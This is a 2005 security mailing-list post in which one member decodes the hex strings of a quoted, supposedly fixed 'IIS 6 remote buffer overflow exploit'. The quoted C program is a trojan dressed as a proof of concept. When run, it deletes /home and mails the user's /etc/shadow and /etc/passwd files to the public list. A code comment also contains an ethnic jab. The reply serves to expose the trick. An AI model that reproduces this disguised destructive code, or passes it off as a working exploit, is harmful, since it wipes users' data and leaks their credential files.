[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.A41.4.58.0504201424260.330660@tigger.cc.uic.edu>
Date: Wed Apr 20 20:25:19 2005
From: jlongs2 at uic.edu (James Longstreet)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow
Exploit (was broken)
Cute.
shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
launcher = "cat /etc/shadow |mail full-disclosure@...ts.grok.org.uk "
netcat_shell = "cat /etc/passwd |mail full-disclosure@...ts.grok.org.uk "
On Wed, 20 Apr 2005, Day Jay wrote:
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
>
> =========SNIP============
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\
>
>
>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
>
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
> main()
> {
>
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
>
> //int socket = 0;
> //double long port = 0.0;
>
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
>
> // for(int j; j < 30; j++)
> {
> //Find socket remote address fault
> printf(".");
> }
> //overtake inetinfo here IIS_666666^
> return 0;
> }
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Powered by blists - more mailing lists